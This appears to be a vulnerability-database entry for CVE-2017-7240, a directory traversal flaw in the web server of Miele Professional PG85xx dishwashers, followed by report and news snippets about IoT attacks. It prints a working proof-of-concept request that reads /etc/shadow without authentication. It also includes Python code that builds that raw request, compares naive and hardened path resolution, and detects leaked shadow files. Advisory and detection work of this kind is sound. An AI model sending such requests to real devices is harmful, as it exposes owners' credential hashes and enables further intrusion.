An issue exists on Miele Professional PST10 devices. The corresponding embedded web server, "PST10 WebServer", typically listens on port 80 and is vulnerable to directory traversal; an unauthenticated attacker may therefore be able to read arbitrary files from the device and use the information to aid subsequent attacks. A proof of concept is the single request GET /../../../../../../../../../../../../etc/shadow HTTP/1.1, sent with the ".." segments left un-normalized. This affects PG8527 devices 2.02 prior to 2.12, PG8527 devices 2.51 prior to 2.61, PG8527 devices 2.52 prior to 2.62, PG8527 devices 2.54 prior to 2.64, PG8528 devices 2.02 prior to 2.12, PG8528 devices 2.51 prior to 2.61, PG8528 devices 2.52 prior to 2.62, PG8528 devices 2.54 prior to 2.64, PG8535 devices 1.00 prior to 1.10, PG8535 devices 1.04 prior to 1.14, PG8536 devices 1.10 prior to 1.20, and PG8536 devices 1.14 prior to 1.24.
Vulnerable Product |
---|
miele_professional pst10_webserver |
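The following is an added worked example, not Miele's code and not a reconstruction of the PST10 WebServer's real logic. It shows the two halves of the issue described above: how a naive embedded server maps a URL path onto the filesystem versus a hardened resolver that collapses ".." segments and refuses anything outside the document root, and how the PoC request has to be built as raw bytes (most HTTP client libraries collapse the ".." before sending, which is why a raw socket or curl --path-as-is is needed). The web root /var/www, the host 192.0.2.10 and the sample HTTP responses are constructed for the example; the PoC path is copied verbatim from the advisory text.

```python
"""Directory traversal on an embedded web server: naive vs. hardened path
resolution, plus a raw-request builder and a response check for the
/etc/shadow PoC.

Added illustration only. Not Miele's code; WEB_ROOT, the target host and the
sample responses are constructed for this example.
"""
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # hypothetical document root, assumed for the example
# PoC path copied from the advisory text
POC_PATH = "/../../../../../../../../../../../../etc/shadow"


def resolve_naive(web_root: str, request_path: str) -> str:
    """What a careless server does: glue the decoded URL path onto the web
    root. The '..' segments survive and the kernel resolves them on open()."""
    return web_root + unquote(request_path)


def naive_opens(web_root: str, request_path: str) -> str:
    """The file the kernel actually opens for the naive mapping."""
    return posixpath.normpath(resolve_naive(web_root, request_path))


def resolve_hardened(web_root: str, request_path: str) -> Optional[str]:
    """Decode, collapse dot segments, then refuse anything outside web_root.
    Returns the filesystem path to serve, or None (answer 403/404)."""
    root = posixpath.normpath(web_root)
    candidate = posixpath.join(root, unquote(request_path).lstrip("/"))
    target = posixpath.normpath(candidate)  # '/var/www/../../etc' -> '/etc'
    if target != root and not target.startswith(root + "/"):
        return None  # escaped the document root
    return target


def build_raw_request(host: str, path: str) -> bytes:
    """Serialize the PoC exactly as typed. Meant for a raw socket: HTTP
    client libraries normally normalize '..' away before sending."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


# /etc/shadow layout: name:hash:lastchange:min:max:warn:inactive:expire:reserved
_SHADOW_LINE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]*:[^:]*(?::\d*){7}")


def looks_like_shadow(body: str) -> bool:
    """True if at least one line has the nine-field /etc/shadow layout."""
    return any(_SHADOW_LINE.fullmatch(line) for line in body.splitlines())


def check_response(raw: str) -> bool:
    """Parse a raw HTTP response; flag 200 plus shadow-formatted body as a leak."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or parts[1] != "200":
        return False
    return looks_like_shadow(body)


# Constructed responses (not captured from any device) to exercise check_response.
SAMPLE_LEAK = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
    "root:$6$constructed$notarealhash:17500:0:99999:7:::\n"
    "daemon:*:17500:0:99999:7:::\n"
)
SAMPLE_NOT_FOUND = "HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
SAMPLE_HTML = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>ok</body></html>\n"


if __name__ == "__main__":
    print(build_raw_request("192.0.2.10", POC_PATH).decode())  # RFC 5737 test address
    print("naive server opens:", naive_opens(WEB_ROOT, POC_PATH))
    print("hardened server serves:", resolve_hardened(WEB_ROOT, POC_PATH))
    print("leak detected in sample:", check_response(SAMPLE_LEAK))
```

Two caveats for anyone checking a device: decode percent-encoding before normalizing (the hardened resolver above does, so %2e%2e/ is caught), and treat a 200 with shadow-formatted lines as confirmation only if the request really left the client un-normalized; otherwise a clean result may just mean the client collapsed the path.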
Cybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead. We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Thanks a Miele-on for making everything dangerous, Internet of Things firmware slackers
Don't say you weren't warned: Miele went full Internet-of-Things with a network-connected dishwasher, gave it a web server, and now finds itself on the wrong end of a security bug report, and it's accused of ignoring the warning. The utterly predictable vulnerability advisory on the Full Disclosure mailing list details CVE-2017-7240, aka "Miele Professional PG 8528 - Web Server Directory Traversal." This is the built-in web server that's used to remotely control the glassware-cleaning mac...